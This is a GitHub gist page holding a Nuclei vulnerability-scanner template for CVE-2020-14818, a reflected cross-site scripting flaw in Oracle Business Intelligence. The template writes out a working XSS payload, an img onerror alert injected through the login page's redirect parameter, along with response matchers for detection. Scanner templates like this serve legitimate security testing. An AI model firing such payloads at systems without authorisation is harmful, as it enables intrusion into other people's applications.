Skip to content

Instantly share code, notes, and snippets.

@emadshanab
Forked from rootsploit/CVE-2020-14818.yaml
Created December 18, 2023 06:50
Show Gist options
  • Save emadshanab/e38e51d42fb9c503c1c0fc9f679a2d7e to your computer and use it in GitHub Desktop.
Save emadshanab/e38e51d42fb9c503c1c0fc9f679a2d7e to your computer and use it in GitHub Desktop.
Nuclei Template for CVE-2020-14818: Oracle Business Intelligence - Reflected XSS
id: cve-2020-14818
info:
name: Oracle BI - XSS by @HackerOn2Wheels
author: RootSploit
severity: medium
description: Reflected Cross-site scripting (XSS) on Oracle Business Intelligence
requests:
- method: GET
path:
- '{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect="><img/src/onerror%3dalert(1337)>'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bitechLogin.setup"
part: body
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment